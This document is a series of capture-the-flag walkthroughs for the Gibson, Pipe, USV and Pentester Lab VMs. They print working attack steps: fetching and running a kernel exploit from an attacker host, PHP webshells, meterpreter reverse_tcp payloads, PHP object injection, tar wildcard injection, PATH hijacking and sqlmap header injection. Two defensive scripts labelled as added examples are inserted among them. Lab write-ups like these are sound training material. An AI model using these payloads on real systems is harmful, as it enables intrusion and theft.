Hack the Gibson VM (CTF Challenge)

It’s a boot2root challenge, and it is not over once you get root access: you also have to find the flag. So let’s start.

First of all download lab from https://download.vulnhub.com/gibson/gibson.ova

Now open a Kali terminal and, as always, start with the first step, i.e. netdiscover.

netdiscover

It shows all the hosts that are up in our network, and from here we get our target IP.

Target IP: 192.168.1.6

As our target is all set, we are going to scan it with nmap, which will show all the open ports. In this case only two ports are open, i.e. 22 and 80.

nmap -p- -A 192.168.1.6

From the above result we have port 80 open, so we open the target IP in the browser. It shows an accessible directory. Let’s try opening it, as we cannot see anything important here.

Oh, no such luck with this either. It says the result will be found by brute force, but there is no place where we can apply brute force.

As we do not have any other option, let’s just view the page source to see if we can get any clue to move further in our task. Right-click on the page and choose View Page Source. Great, we have the password god for the user margo.

Now, from our nmap result, port 22 is open, which is for SSH login. So open it in the Kali terminal:

ssh margo@192.168.1.6

And the password is god, which we got from the last result. Good, we now have access to our lab.

Our next step is to find the kernel version of the lab, and for that type

lsb_release -a

It shows that Ubuntu 14.04 is used, and to get root access of the lab we will use the particular exploit made for this kernel version, i.e. 39166. So first download it and then compile it with the command

gcc 39166.c -o 39166

After compiling, copy it to /var/www/html on Kali, then run the commands given below on the target to get root access:

cd /tmp

wget http://192.168.1.7/39166

chmod 777 39166

./39166

As we have root access, the first challenge is finally completed. Now it’s time to find the flag.

Now that we are root, we will download the LinEnum.sh zip file to get a better picture of the Linux system for privilege escalation. After unzipping it, move into the folder and copy the LinEnum.sh file to /var/www/html. Perform the following commands with the IP of Kali Linux:

wget http://192.168.1.7/LinEnum.sh

chmod 777 LinEnum.sh

./LinEnum.sh

It shows all the services running.

Here we get an interesting file, which is highlighted in the image below. It shows that some external server is running.

Now in the process list we see something like ftpserv, so we can just search based on that.

find / -name 'ftpserv*' 2>/dev/null

Awesome, it gives us a ftpserv.img file, which can prove to be a useful thing.

Now I copied this ftpserv.img file for easy downloading.

cp /var/lib/libvirt/images/ftpserv.img /var/www/html

chmod 777 /var/www/html/ftpserv.img

Here I downloaded that ftpserv.img file to my Kali Linux.

wget http://192.168.1.6/ftpserv.img

This time I checked the file type of the downloaded file and then attached it to a loop device at the offset of its first partition (sector 63, i.e. 63*512 bytes):

file ftpserv.img

losetup -o $((63*512)) /dev/loop0 /root/ftpserv.img

This gives us access to the contents of ftpserv.img, which has some files inside it. When I opened the garbage folder there, I saw a flag.img file, which is what we need, i.e. the flag.
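The 63*512 offset passed to losetup is the start of the first partition inside the image. As an added example, not part of the original write-up, this script reads that offset from the image's MBR partition table instead of hard-coding it, and builds a small constructed test image to check itself against.

```shell
#!/bin/sh
# Read the MBR partition table of a raw disk image and print the byte offset that
# losetup -o / mount -o offset need, instead of hard-coding 63*512.
# Added example for this write-up; the image built by make_test_image is constructed.

# mbr_part_offset IMAGE [N]  -> prints the byte offset of primary partition N (1-4)
mbr_part_offset() {
  img=$1
  n=${2:-1}
  # MBR layout: four 16-byte partition entries start at byte 446; 0x55AA sits at 510
  entry=$((446 + (n - 1) * 16))
  sig=$(od -An -tx1 -j 510 -N 2 "$img" | tr -d ' \n')
  if [ "$sig" != "55aa" ]; then
    echo "$img: no MBR signature (0x55AA) at byte 510" >&2
    return 1
  fi
  # byte 4 of the entry is the partition type; 0x00 means the slot is unused
  ptype=$(od -An -tx1 -j $((entry + 4)) -N 1 "$img" | tr -d ' \n')
  if [ "$ptype" = "00" ]; then
    echo "$img: partition $n is unused" >&2
    return 1
  fi
  # bytes 8-11 of the entry: first LBA sector, little-endian; assemble byte by byte
  set -- $(od -An -tu1 -j $((entry + 8)) -N 4 "$img")
  lba=$(( $1 + ($2 << 8) + ($3 << 16) + ($4 << 24) ))
  echo $((lba * 512))
}

# make_test_image PATH: a constructed 512-byte MBR with one Linux (0x83) partition
# starting at LBA 63, the same layout the article's 63*512 offset corresponds to
make_test_image() {
  dd if=/dev/zero of="$1" bs=512 count=1 2>/dev/null
  # status 0x80, CHS start, type 0x83, CHS end, LBA start 63, length 2048 sectors
  printf '\200\001\001\000\203\376\077\010\077\000\000\000\000\010\000\000' |
    dd of="$1" bs=1 seek=446 conv=notrunc 2>/dev/null
  printf '\125\252' | dd of="$1" bs=1 seek=510 conv=notrunc 2>/dev/null
}

# Typical use on the image from the write-up:
#   off=$(mbr_part_offset ftpserv.img 1) && losetup -o "$off" /dev/loop0 ftpserv.img
```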

Open the garbage folder in the terminal and make a directory flag for mounting flag.img on it.

mkdir flag

mount -t ext2 flag.img flag

Now I open the flag folder, and here I can see all the data of flag.img, including hidden files.

cd flag

ls -la

From the list of files I open the .trash folder.

cd .trash

ls -la

And here we can see that we finally got our flag, but it’s in another file type, so let’s check it.

file flag.txt.gpg

This shows that the task is not completed yet: we still have an encrypted flag.

Though we have our flag, we do not have the key for decryption. So, looking around, I found a hint.txt file next to the flag which could well hold the key to open it. So let’s open it.

cat hint.txt

Here we can see that it gives 2 links.

Now we open the above links in the Firefox browser, and we get 2 movies which have only one thing in common, i.e. the actor Jonny Lee Miller.

After a Google search about these movies and Jonny Lee Miller, I came to know that in the movie Hackers he has aliases like zerocool, crash override, etc. So, using the cupp tool, I created a dictionary. Then I ran the following loop in the .trash folder; it tries each word as the passphrase and so decrypts our encrypted flag as well.

for x in $(cat /root/Desktop/cup/zerocool.txt); do
  echo "[*] trying $x"
  gpg --batch --output flag.txt --passphrase "$x" --decrypt flag.txt.gpg
done

At the bottom gpg reports that flag.txt already exists, meaning one of the passphrases worked.

Now running the ls command again shows the flag.txt file, which is basically our flag. So at last type the given command.

cat flag.txt

Fantastic, after all the difficulties we successfully got our flag.

Author: Shailesh Kumar is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast.

Hack the Pipe VM (CTF Challenge)

PIPE is another CTF which gives you a platform to enhance your penetration testing skills. So let’s not waste any more time and get started with it.

First of all, download the Pipe lab from here.

As always, our first step is to run the netdiscover command to see the active hosts in our network.

netdiscover

Target IP: 192.168.0.103

As we have the target IP, we will do an nmap scan to see if there are any ports open for further penetration.

nmap -p- -A 192.168.0.103

And from here we get the open ports 22, 80, 111 and 54073.

Now we will open the target IP in the browser, as port 80 is open. Here the website shows an unauthorized message with a login page. On the login window it says “the site says: index.php”, which we will be using later on.

Now, using Burp Suite, we are going to capture the request for the login page by setting a manual proxy in the Firefox browser. It has intercepted the request for the login page. The GET method in the request line has to be changed as follows to get past the authentication.

HACK /index.php

After this step, forward the request to the browser; the process executes and we finally get into the website. OK! The above step leads us to a website which shows a PIPE picture and a link below it to get the artist info.

As we cannot see anything else on this web page, right-click anywhere on the page and choose View Page Source. It shows an accessible directory, scriptz, in its script content.

Now open the target IP with scriptz in the browser.

192.168.0.103/scriptz/

Oh! Look at that, we found an accessible directory.

We will first open the log.php.BAK file and see if it gives us some information to go further. It seems that this file writes itself to the webroot directory. This is very interesting to us, especially if we can control the `data` field supplied to the file.

cat log.php.BAK

Now return to our original web page and at the same time start Burp Suite with a manual proxy set for it. Click on the link given below the image and capture that request in Burp.

Here we have the intercepted data in the Burp window, which shows the parameter used for the above web page.

After the above step, right-click on this window; a list of options will appear. Choose Send to Repeater, and as a result 2 windows open, one for the request and one for the response.

Select the parameter in the request tab and send it to the Smart Decoder for decoding. This can be done by right-clicking on the selected text and sending it to the Decoder. Now select the Decoder tab from the top menu and choose Smart Decode from the left side menu. In the image below the red highlighted text is decoded and the result is shown in the window below it; the code shown in the bottom window needs to be altered so that we can upload our malicious code.

Going back to our intercept window, we see that our earlier parameter is decoded and we can make changes according to our requirements. The changes are as follows (the numbers after s: are string lengths, so they have to match the new values).

O:4->O:3, Info->log, s->8, id->filename, s->31

Then give the path of the file, i.e. /var/www/html/scriptz/shell.php

s->4, rene->data, s->60

and then the code which is to be executed, i.e. <?php echo '<pre>' ; system($_GET['cmd']) ; echo '</pre>';?>

Now forward the request to the browser.

Great, our shell.php file is uploaded to that accessible directory.

Now that we have uploaded the shell, it’s time to open it and see what it gives us. As we have executed the code for cmd, we pass the cmd parameter in the URL as well.

cmd=id

It shows the following output for the command we executed.

uid=33(www-data) gid=33(www-data) groups=33(www-data)

That’s the game! It’s time to exploit through the shell that we have uploaded to the accessible directory.

Now open a terminal in Kali Linux and start Metasploit by typing msfconsole.

Then search for the web_delivery exploit, use it, set the target, payload, lhost and lport, and run the exploit.

use exploit/multi/script/web_delivery

show targets

set target 2

set lhost 192.168.0.104

set lport 4444

set payload php/meterpreter/reverse_tcp

run

At last, when all the commands are executed, it provides a one-line command at the bottom of the image.

Now copy the code we get as a result, paste it in the URL after cmd= and execute it.

As soon as we execute the code in the URL we get a meterpreter session on our target, i.e. PIPE.

Now we will go to a shell by typing

shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

Our next step is to find the kernel version of Ubuntu. To know that, type: lsb_release -a

We check for any cron jobs running on the system via cat /etc/crontab, and we can see a couple of cron jobs which interest us.

In /etc/crontab the script /usr/bin/compress.sh is listed, and it is world readable. Now it’s time to do some magic; follow these steps:

cd /home/rene/backup

echo 'cp /root/flag.txt /tmp/flag.txt; chmod +r /tmp/flag.txt' > flag.sh

touch /home/rene/backup/--checkpoint=1

touch /home/rene/backup/--checkpoint-action=exec=sh\ flag.sh

cd /tmp

At last open this flag.txt file and we have our flag. Mission accomplished!

Author: Shailesh Kumar is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast.

Hack the USV VM (CTF Challenge)

A new challenge for all of you guys!

This CTF is all about conquering the flags that come across our way as we go further in our penetration testing of this lab. All the flags should be discovered in the form: Country name Flag:[md5 hash]. The network interface of this virtual machine takes its IP settings from DHCP.

Download the lab from here: https://www.vulnhub.com/entry/usv-2016-v101,175/

Let’s get started with our first step.

netdiscover

From this we get our target IP.

Target IP: 192.168.0.103

Now we will scan it with nmap, which will give us all the open ports in this lab for further penetration testing.

nmap -p- -A 192.168.0.103

This result shows that the following ports are open: 22, 80, 3129, 3306 and 21211, and an HTTP proxy is running on port 3129.

So now let’s proceed with further penetration testing. Firstly, we’ll go with SSH on port 22.

ssh 192.168.0.103

SSH revealed an ASCII dragon with some strings and a base64 string written at the bottom. Looking closer, you’ll see AES-ECB written on top.

By a Google search we found out that there is a website called aesencryption.net where we can decrypt the base64 string we got in our last result. So we decrypt that string with the key given in the image, and by all this process we arrive at our 1st flag, i.e. the ITALY FLAG.

OK, so now let’s head towards the second flag, and for that we are going to open the target IP in the browser, as port 80 is also open. Look at that: we got Access Forbidden. No result.

While opening the target IP in the browser we also captured the request through Burp Suite after setting the manual proxy in the browser. When all this is done, right-click on the window where the intercepted data is shown; an action list appears, then click Send to Repeater.

Look over the screenshot below; you will find two panels, left and right, for request and response respectively. In the response window the highlighted text is our flag.

As this code is in base64, we are going to use the HackBar plugin in Mozilla Firefox, which is preinstalled or can easily be installed. Whoa, decoding the code in it we got another flag, which is our second flag, i.e. the CROATIA FLAG.

Moving ahead, from our nmap result we know that an HTTP proxy is on port 3129, so we set the browser’s proxy to our target IP with port 3129 as shown below.

Now try opening the target IP in the browser and wait a few seconds, like 10 sec. The proxy setting did the trick and the website reveals a single page with a changing banner of “WINTER IS COMING” and “ALL MEN MUST DIE”. Some of you may be aware of this, but for those who do not know: it is Game of Thrones.

The site didn’t show much, so I used the nikto scanner through the proxy to get some information about it which will be helpful in further testing.

nikto -h 192.168.0.103 -useproxy http://192.168.0.103:3129

It reveals a WordPress login at /blog.

OK! Now open it in the browser. Great, the Game of Thrones notion is confirmed, as a Seven Kingdoms blog is shown.

Scrolling down on this site you can see an interesting second post which says ‘I have a message for you’. There is a highlighted option, so just try to open it in the browser.

Awesome!!!! This reveals a message and a download link for a zip file. Interesting, so go ahead and download it.

Unzipping the file shows an image of a man with a bottle of perfume and a base64 encoded string at the bottom.

Here we decode the string in the HackBar plugin, which gives another flag. From this step we got our third flag, i.e. the PORTUGAL FLAG.

Now, returning to the previous site, there are several posts which are all useless, so just scroll down to see if there is something useful or not, and then comes a last post which is of our interest.

‘Protected: the secret chapter’

Oh! We have to provide a password to get through it. This one took some time, and to spare your time I won’t go through my failures.

I created a dictionary of possible passwords, which are nothing but some of the words on this whole site, with the help of the following command.

cewl -d 2 -m 5 --proxy_host 192.168.0.103 --proxy_port 3129 -w /root/Desktop/dict.txt http://192.168.0.103/blog/

From the list we find that the password is ‘westerosi’.

Using this password we came to another page which revealed another flag as a base64 encoded string, and below it some images of an actress.

Now decode it again in HackBar, and as a result we have our fourth flag, i.e. the PARAGUAY FLAG.

Moving one level up, from the site we got another message: “the mother_of_dragons has a password which is right in front of your eyes”.

Knowing nothing about the eyes of the actress, I resorted to Google to see if I could get any clue from there, but no such luck.

I looked at the message again, and it states ‘password which is in front of your eyes’.

That’s it: the password of mother_of_dragons is ‘in front of your eyes’. But wait a minute, where is this password used?

We have an FTP service running. So let’s try and get through it.

ftp 192.168.0.103 21211

ls -al

get .note.txt

exit

cat .note.txt

Bingo! Here that password is used. At the bottom the result shows that the children’s names are used for a password. Again a password, but this time it is used for the WordPress login, which we are going to use in the coming steps.

Again I googled and found out she didn’t have any children but rather had 3 dragons named Drogon, Rhaegal and Viserion. So I put all these names into a file along with all possible combinations.

The list is small, so by entering each one the desired password could be found.

Password is RhaegalDrogonViserion

Apply the credentials to WordPress and we are in!

Looking around the site I found the profile section, which reveals the base64 encoded string for mother_of_dragons.

As always, decode the base64 string in HackBar and here we have another flag.

This is our fifth flag, i.e. the THAILAND FLAG

Now, with only 2 flags left, it’s time for shell access, as we have WordPress.

Moving further, first make a PHP payload with msfvenom which can be used to get the meterpreter session.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw

Being admin of the site, I am able to edit the theme. So I replaced the 404.php code of the template in the Viking theme with the above highlighted PHP code.

On the other side, to get the meterpreter session, open a Kali terminal and run the multi handler. For that type the following commands (lhost is the Kali IP the payload was generated with).

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.104

set lport 4444

exploit

As we have a meterpreter session, now go to a shell and type the following commands:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

cd /srv/http

ls

It shows a reward_flag.txt file, so read it with the cat command.

cat reward_flag.txt

As a result we get a base64 encoded string.

Do not worry, soon this decoding thing is going to be over, as we have our sixth flag with this decoding. So as a result our sixth flag is the MONGOLIA FLAG.

Back to another file in the above list of files, i.e. winterfell_messenger. We see it’s executable and its owner is root. So run it with the following command:

./winterfell_messenger

cat: /root/message.txt

It shows that it’s using the cat command to read a file in the /root directory.

Using strings shows that the cat command is being used; however, it’s not using the full path to the program. From this we come to know that it will search PATH to find it.

Now, we are able to update PATH by using export, but first we need to find a writable directory, and for that we have used /tmp. In /tmp we will create an executable file named cat so that it gets called by the winterfell_messenger program. This file will be running as root, so we use it to call /bin/bash and get a shell. Run the following commands.

echo "/bin/bash" > /tmp/cat

chmod 777 /tmp/cat

echo $PATH

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

After this step we are going to update PATH so that the /tmp directory we used comes first. For this type the following command.

export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

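Two checks a system owner can run for the weakness exploited here, added as an example and not part of the original write-up: one lists strings in a binary that call a helper such as cat by bare name, the other lists PATH entries an unprivileged user could write to. The file and directories used in the test are constructed.

```shell
#!/bin/sh
# Two checks for the winterfell_messenger PATH weakness: a privileged program that
# invokes a helper by bare name, and a PATH that reaches a directory other users can
# write to. Added example for this write-up; the binary content and directories used
# in the test are constructed, not taken from the VM.

# bare_commands FILE: print printable strings in FILE that invoke a common tool by
# bare name ("cat /root/message.txt") rather than by absolute path ("/usr/bin/cat ...").
# Such a string in a setuid or root-run binary means the helper is resolved via PATH;
# the fix is an absolute path, or resetting PATH to a fixed value before system().
bare_commands() {
  tr -c '[:print:]' '\n' < "$1" |
    grep -E '^[[:space:]]*(cat|ls|id|cp|mv|rm|sh|bash|tar|chmod|chown|wget|curl)([[:space:]]|$)'
}

# writable_path_dirs [PATH]: print entries that are empty/relative (i.e. the current
# directory) or world-writable; any such entry lets an unprivileged user plant "cat".
writable_path_dirs() {
  (
    IFS=:
    set -f   # no glob expansion of PATH entries
    for d in ${1:-$PATH}; do
      case $d in
        '' | [!/]*) printf '%s\n' "${d:-(empty)}"; continue ;;
      esac
      # -perm -0002: other-write bit set (e.g. /tmp with mode 1777)
      [ -d "$d" ] && [ -n "$(find "$d" -maxdepth 0 -perm -0002)" ] && printf '%s\n' "$d"
    done
    :
  )
}
```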

Now, we will go to the home directory of http to get the desired file. For that type

cd /srv/http

ls

Now call the winterfell_messenger file by using the given command.

./winterfell_messenger

id

Now go to root’s home directory, and there we have a .flag.txt file.

Running cat against .flag.txt, we get a congratulations, a wolf made up of ASCII characters and a base64 encoded string at the bottom. The commands are given below; the real cat is called by its full path, since /tmp/cat now shadows it.

cd /root

/usr/sbin/cat .flag.txt

Finally, decoding in HackBar reveals the seventh and last flag, which is nothing but the SOMALIA FLAG.

Voila. We reached the end, and with this the job is done. Hope you enjoyed it, and obviously your penetration skills are refreshed.

Author: Priya Singh is an enthusiastic researcher and technical writer at Hacking Articles. Contact here

Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

Today we are going to perform penetration testing with part II of the previous lab; download it from here. Now install the ISO image in VMware and start it. In this lab the task level is intermediate, and the challenge is to gain access to the administration console and then upload a PHP webshell.

Start Kali Linux, open the terminal and type the netdiscover command to scan the network. Here 192.168.1.102 is my target IP, as shown in the screenshot. Now open this IP in the browser.

When you open the target IP in the browser you get a web page with the heading My Awesome Photoblog. At the top left it contains some tags: home; test; ruxcon; 2010; all pictures; admin. Now click on test.

The given URL http://192.168.1.102/cat.php?id=1 runs an SQL query for ID 1. Now let’s try to find out whether the above URL is vulnerable to SQL injection by adding an apostrophe (') at the end of the URL:

http://192.168.1.102/cat.php?id=1'

It is not vulnerable: I didn’t get any error message like I got in part 1. Then I tried to find out whether the other IDs are vulnerable, but here also I found nothing.

Now use nikto to scan the target for any vulnerability; type the following command.

nikto -h 192.168.1.102

Look over the highlighted part in the screenshot; the result tells us that the X-Content-Type-Options header is not set.

Then I used Acunetix to scan the target, which declared the threat level high for blind SQL injection.

Hence it is clear that we should exploit the target through SQL injection.

Now type the following command for blind SQL injection using sqlmap:

sqlmap -u "http://192.168.1.102/cat.php?id=1" --headers="X-Forwarded-For: *" --dbs --batch

Here we try SQL injection in a header: the target application might be designed to use the X-Forwarded-For header, which is used when an application runs behind a reverse proxy.

Our assumption is correct: the above header is vulnerable to SQL injection, and I got the database name photoblog.

Now let’s fetch all the data under the photoblog database with the following command:

sqlmap -u "http://192.168.1.102/cat.php?id=1" --headers="X-Forwarded-For: *" -D photoblog --dump-all --batch

Here the task was to gain access to the administration console, for which we require the login and password of the admin account. Through the sqlmap command we got the login admin and the password P4ssw0rd.

Now use the above credentials to access the administration console: again open the target IP 192.168.1.102 in the browser, click on the admin tab at the top left, and type the login admin and password P4ssw0rd.

Congrats!!! The first task is completed.

Now the last task is to upload a PHP webshell. Under the administration console you will notice a link Add a new picture, for uploading an image to this web server. Click on Add a new picture to upload an image.

Here we can upload an image through the Add option; now I will try to upload a PHP webshell.

I tried to upload a malicious PHP file using the .php extension, a double extension .php.jpg, and also case variations like PHP and pHP, but every time it failed to upload the backdoor and the following web page opened.

Then I used exiftool to hide the malicious code inside a PNG image. For this step you need to download an image and save it on the desktop. Now prepare a PHP file by typing the following command injection code into a text file and save it with the .php extension; I saved it as raj.php on the desktop.

<?php $cmd=$_GET['cmd']; system($cmd); ?>

Now type the commands for exiftool to hide the PHP code inside the PNG image:

cd Desktop

exiftool "-comment<=raj.php" 1.png

exiftool 1.png

From the screenshot you can see I have three files on the desktop: raj.php, the downloaded original image as 1.png_original, and the PHP webshell as 1.png.

Now I browsed to 1.png to add it as a new image, which is our PHP webshell.

Our malicious file was successfully uploaded to the web server. You can see a new row is added as webshell php, which contains our backdoor raj.php; now click on webshell php.

Here is our malicious image; now right-click on it and click View Image.

The image opens in a separate window, and if you remember, it contains the command injection code.

Here I tried to execute the ls command by adding /cmd.php?cmd=ls/etc at the end of the URL, and from the screenshot you can see this page is shown encoded.

Now the last option is to use Repeater in Burp Suite to execute the commands. Start Burp Suite, set the manual proxy in the browser, then open the web page where the “you are hacked” image is uploaded.

Now capture the request through Burp Suite and send the intercepted data to Repeater by right-clicking on its window.

Now change the request line from /show.php?id=4 to /admin/uploads/1484502823.png/cmd.php?cmd=ls, then click the Go tab to send this request and get the response; scrolling down in the response, I found some information through the ls command.

Great!!! We have completed both tasks.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast. Contact here
